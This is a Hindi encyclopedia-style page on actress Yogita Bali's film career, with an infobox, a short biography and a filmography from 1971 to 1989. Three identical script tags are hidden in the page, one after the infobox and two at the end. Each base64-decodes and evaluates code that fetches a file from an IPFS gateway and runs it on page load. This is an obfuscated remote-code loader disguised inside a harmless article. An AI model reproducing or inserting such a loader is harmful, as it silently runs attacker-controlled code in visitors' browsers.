योगिता बाली का फ़िल्मी कॅरियर

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
योगिता बाली विषय सूची


योगिता बाली का फ़िल्मी कॅरियर
योगिता बाली
पूरा नाम योगिता बाली
जन्म 13 अगस्त, 1952
जन्म भूमि मुम्बई, महाराष्ट्र
अभिभावक पिता- जसवंत, माता- हरदर्शन कौर
पति/पत्नी किशोर कुमार, मिथुन चक्रवर्ती
कर्म भूमि भारत
कर्म-क्षेत्र हिन्दी सिनेमा
मुख्य फ़िल्में 'परवाना', 'एक मुठ्ठी आसमान', 'चौकीदार', 'अजनबी', 'नागिन', 'महबूबा', 'चाचा भतीजा', 'भक्ति में शक्ति', 'जानी दुश्मन', 'जमाने को दिखाना है', 'राजतिलक' आदि।
प्रसिद्धि अभिनेत्री
नागरिकता भारतीय
अन्य जानकारी योगिता बाली 1950-1964 के दौर की मशहूर अभिनेत्री गीता बाली की भांजी हैं। मशहूर निर्देशक आदित्य राज कपूर और निर्माता कंचन खेतान देसाई उनके चचेरे भाई हैं।
अद्यतन‎

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

योगिता बाली अपने समय की प्रसिद्ध अभिनेत्री गीता बाली की भानजी हैं, लेकिन वे फ़िल्मों में वैसा कमाल नहीं दिखा पाईं, जो गीता बाली ने हासिल किया था। योगिता को अधिकांशत: उन फ़िल्मों में ज्यादा देखा गया, जिन्हें प्रथम श्रेणी की सिने तारिकाएँ ठुकरा कर देती थीं। अपने कॅरियर के शुरुआती दौर में फ़िल्म निर्देशकों ने योगिता को सेक्स सिम्बल के रूप में प्रस्तुत किया और उनसे शारीरिक प्रदर्शन करवाए गये, क्योंकि उनकी बड़ी-बड़ी आँखों से भोलापन, मासूमियत और शरारती आकर्षण एक साथ झलकता था।

कॅरियर

योगिता बाली का गीता बाली से रिश्ता होने की वजह से उन्हें 1971 में बनी फिल्म ‘परवाना’ में अभिनय करने का मौका मिला। इस फिल्म में उन्होंने बॉलीवुड एक्टर अमिताभ बच्चन के साथ फ़िल्मी पर्दे पर अभिनय किया और दूसरी मुख्य अभिनेत्री के रूप में काम किया। हालांकि 1979 में मिथुन चक्रवर्ती से विवाह के बाद योगिता ने फिल्मों में काम करना कम कर दिया था। योगिता ने 1989 में फिल्म ‘आखिरी बदला’ में मिथुन चक्रवर्ती के साथ काम किया। इसके बाद उन्होंने कोई फिल्म नहीं की।

प्रमुख फ़िल्में

योगिता बाली की प्रमुख फ़िल्में
फ़िल्म वर्ष
परवाना 1971
पर्दे के पीछे 1971
जमीन आसमान 1972
नफरत 1973
एक मुठ्ठी आसमान 1973
चौकीदार 1974
अपराध 1974
अजनबी 1974
जिंदगी और तूफान 1975
नागिन 1976
महबूबा 1976
धूप छाँव 1977
चाचा भतीजा 1977
कर्मयोगी 1978
भक्ति में शक्ति 1978
सलाम मैमसाहब 1979
जानी दुश्मन 1979
आखिरी कसम 1979
ख्वाब 1980
उन्नीस बीस 1980
ओह बेवफा 1980
जमाने को दिखाना है 1981
कराटे 1983
वक्त की पुकार 1984
राजतिलक 1984
लैला 1984
गृहस्थी 1984
ये इश्क नहीं आसान 1984
मेरा कर्म मेरा धर्म 1987
आखिरी बदला 1989


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

योगिता बाली विषय सूची

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>